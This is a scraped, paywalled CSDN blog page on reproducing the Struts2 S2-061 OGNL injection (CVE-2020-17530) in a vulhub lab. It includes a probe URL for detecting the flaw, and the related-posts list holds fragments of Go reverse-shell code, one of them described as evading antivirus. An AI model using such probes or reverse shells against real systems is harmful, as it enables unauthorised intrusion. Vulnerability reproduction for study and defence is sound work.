golang 远程批量执行shell_S2061远程代码执行漏洞复现及批量检测脚本(CVE202017530)...

最新推荐文章于 2023-06-29 10:26:25 发布
最新推荐文章于 2023-06-29 10:26:25 发布
阅读量468 收藏
点赞数
文章标签: golang 远程批量执行shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30696613/article/details/112087531
版权

声明

由于传播、利用此文所提供的信息或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,博鸿科技安全服务中心以及文章作者不为此承担任何责任。

博鸿科技安全服务中心拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经博鸿科技安全服务中心允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

0x00 软件介绍

struts2:面向JAVA EE的一款java web开发框架

0x01 复现环境

使用环境:vulhub中的环境: https://github.com/vulhub/vulhub/tree/master/struts2/s2-061 复现版本:Apache Struts 2.5.25

0x02 环境搭建

一台云上的vps git clone https://github.com/vulhub/vulhub cd ./vulhub/ cd ./struts2/ cd ./s2-061/ systemctl start docker docker-compose up -d

0x03 利用条件

此次漏洞只是S2-059修复的一个绕过,并且本次利用的核心类org.apache.commons.collections.BeanMap在commons-collections-x.x.jar包中,但是在官方的最小依赖包中并没有包含这个包。所以即使扫到了支持OGNL表达式的注入点,如果没有使用这个依赖包,也还是没办法进行利用

0x04 影响版本

Apache Struts 2.0.0 - Struts 2.5.25

0x05 漏洞复现

攻击环境:kali_x64_en-usEXP1(验证漏洞是否存在): 
http://ybdt.best:8080/?id=%25%7b+%27test%27+%2b+(2000+%2b+20).toString()%7d
查看返回页面的源码,如下图,包含“test2020”表示漏洞存在
最低0.47元/天 解锁文章
原画人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Go-rush--并行执行shell命令
08-14
rush -- 并行执行shell命令。 Go中类似于GNU parallel 的工具,它支持Linux/OS X/Windows!
go 语言Http服务器远程执行shell命令
qq_42931917的博客
12-17 1020
go http服务器
golang实现自动ssh远程linux并执行shell命令
那年没有夏天的博客
01-27 3382
需求:自动ssh远程linux服务器进行巡检,并截图。 实现思路:win10电脑安装openssh客户端软件用于ssh远程linux,golang使用robotgo模拟键盘操作输入shell命令,并截图。 win10安装openssh: golang代码: package main import ( "strings" "time" "github.com/go-vgo/robotgo" ) func main() { robotgo.KeyTap(`r`, `co..
记录一次vulhub:Struts2 S2-061漏洞复现(CVE-2020-17530)
最新发布
sszsNo1的博客
06-29 95
vulhub:Struts2 S2-061漏洞复现(CVE-2020-17530)
Golang反弹shell(使用邮件获取反弹地址)
09-29
使用邮件地址作为反弹shell的服务器地址,用于windows的反弹shell,可在编译时选择隐藏弹出窗口 This golng reverse shell fetches the address from your latest email subject, and the subject should be like this: 10.1.1.1:1234 This golag file requires go-pop3 lib which you can get it here: https://github.com/taknb2nch/go-pop3.git If you want to hide the window when executing it, compile the program like this: go build -ldflags -H=windowsgui email_reverse_shell-repl.go
golang中文手册_golang中文手册_goapiCHM_golang中文手册.chm_
10-02
Go语言,又称Golang,是由Google开发的一种静态类型、编译型、并发型且具有垃圾回收功能的编程语言。它设计的目标是提高开发者的生产效率,同时保持系统级编程的性能。Go语言的设计受到了C、 Pascal、 Miranda和...
pppoe源码.rar_PPPoE源代码下载_golang pppoe_nonrootcn_pppoe_seriousqnn
09-24
发现阶段是寻找和建立与远程访问服务器(RAS)连接的过程,包括PADI(Passive Discovery Initiation)、PADO(Passive Discovery Offer)、PADR(Passive Discovery Request)和PADS(Passive Discovery Session-...
java_celluar.zip_golang_golang 界面_java_celluar
09-21
标题中的“java_celluar.zip_golang_golang 界面_java_celluar”暗示了这是一个与Java和Golang相关的项目,特别是涉及到Golang的图形用户界面(GUI)开发,并且可能是在实现一个基于Java细胞自动机(Cellular ...
golang写的文件批量删除工具delete_tool.exe
06-05
delete_tool.exe是一个可执行文件,它利用了Golang强大的文件操作能力,能够快速遍历指定目录,对其中的文件进行批量删除操作。这个工具的出现,极大地简化了用户手动删除大量文件的繁琐过程,提升了工作效率。 ...
下载golang.org/x包的操作方法
09-19
### 下载golang.org/x包的操作方法 #### 知识点一:Go语言与golang.org/x库 - **Go语言简介**:Go语言(又称Golang)是一种静态类型的、编译型的、并发型,并具有垃圾回收功能的编程语言。它由Google工程师于2007...
如何使用Go语言实现远程执行命令
09-21
远程执行命令最常用的方法就是利用SSH协议,将命令发送到远程机器上执行,并获取返回结果。本文将介绍如何使用Go语言实现远程执行命令。下面一起来看看。
go语言邮件反弹shell(windows+linux版,windows版用go1.7编译运行不报毒
11-03
go语言邮件反弹shell(windows+linux版,windows版用go1.7编译运行不报毒 此版本为后续改进debug版本,windows下可以编译去掉显示窗口 添加linux版本
端口复用/重用反弹shell
04-14
端口复用/重用反弹shell 可以利用系统已经开启的端口,如:139,445,1025等。
golang写的反弹shell(自作孽不可活,切记,切记!)
热门推荐
神棍之路
10-23 7万+
仅作安全研究 package main import ( "go-pop3" "log" "strings" "os/exec" "net" "fmt" "syscall" "bufio" ) func reverseshell(addr string){ c,_:=net.Dial("tcp", addr);
zdpgo_ssh框架使用教程009,使用Golang批量执行ssh命令
Python私教
12-19 432
package main import ( "fmt" "github.com/zhangdapeng520/zdpgo_ssh" ) func main() { s := zdpgo_ssh.New("192.168.18.101", "zhangdapeng", "zhangdapeng", 22) // 批量执行命令 command1 := "mkdir test" command2 := "mkdir test/a" command3 := "ls -lah test" ou
golang编写程序时,shell在子目录批量执行go mod tidy
Hi mengdj
12-04 1883
最近在go的项目里,用到了mod,但目录太多了,有时有的依赖用了后来又废弃了,后来发现go.sum go.mod文件内容好大,了解到go mod tidy可以完成完成检测依赖添加移除工作,于是就执行了,但目录太多了,真的很麻烦,于是乎,写了个shell脚本批量做这个事... chmod +x tidy.sh ./tidy.sh #!/usr/bin/env bash #Author:mengdj@outlook.com #Created Time:2020.12.04 11:56 #Descrip
最新系统漏洞--Google Golang竞争条件漏洞
weixin_48555088的博客
03-24 5457
最新系统漏洞2022年3月22日 受影响系统: Google Golang >= 1.16.0 Google Golang > 1.15.12 Google Golang <= 1.16.5 描述: CVE(CAN) ID: CVE-2021-3622 Google Golang是美国谷歌(Google)公司的一种静态强类型、编译型语言。Go的语法接近C语言,但对于变量的声明有所不同。Go支持垃圾回收功能。 Google Golang存在竞争条件漏洞。该漏洞源于程序在处理ErrAbortH
golang执行shell命令的几种方式
qq_31389153的博客
10-31 5779
Exec 是 os 包中的一个子包,它可用于使用 Go 运行外部命令。Go exec 命令教程展示了如何在 Golang执行 shell 命令和程序。
mysql 反弹shell_golang反弹shell脚本
weixin_31293685的博客
01-27 219
一、Golang语言package mainimport ("fmt""net""strings""io/ioutil""log""os/exec")func cmd_connect(c net.Conn) {if c == nil {return}buf := make([]byte, 4096)for {cnt, err := c.Read(buf)if err != nil || cnt =...
golang中apend_Golang reflect.Append()用法及代码示例
06-02
`append` 函数用于向切片中添加元素,而 `reflect.Append()` 函数则是通过反射实现向切片中添加元素。 使用 `reflect.Append()` 函数需要先创建一个空的切片,然后使用 `reflect.ValueOf()` 函数将其转换为 `reflect.Value` 类型,再使用 `reflect.Append()` 函数向其中添加元素。 以下是一个简单的示例代码: ```go package main import ( "fmt" "reflect" ) func main() { // 创建一个空的切片 slice := make([]int, 0) // 将切片转换为 reflect.Value 类型 v := reflect.ValueOf(&slice).Elem() // 使用 Append 方法向切片中添加元素 v.Set(reflect.Append(v, reflect.ValueOf(1))) v.Set(reflect.Append(v, reflect.ValueOf(2))) v.Set(reflect.Append(v, reflect.ValueOf(3))) // 打印切片 fmt.Println(slice) } ``` 运行结果: ``` [1 2 3] ``` 在上面的示例中,我们使用 `reflect.ValueOf()` 函数将切片 `&slice` 转换为 `reflect.Value` 类型。由于 `&slice` 是一个指向切片的指针,因此我们需要使用 `.Elem()` 方法获取其指向的值。 接着,我们使用 `reflect.Append()` 函数向切片中添加元素,每次添加一个元素。最后,我们打印切片中的元素。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值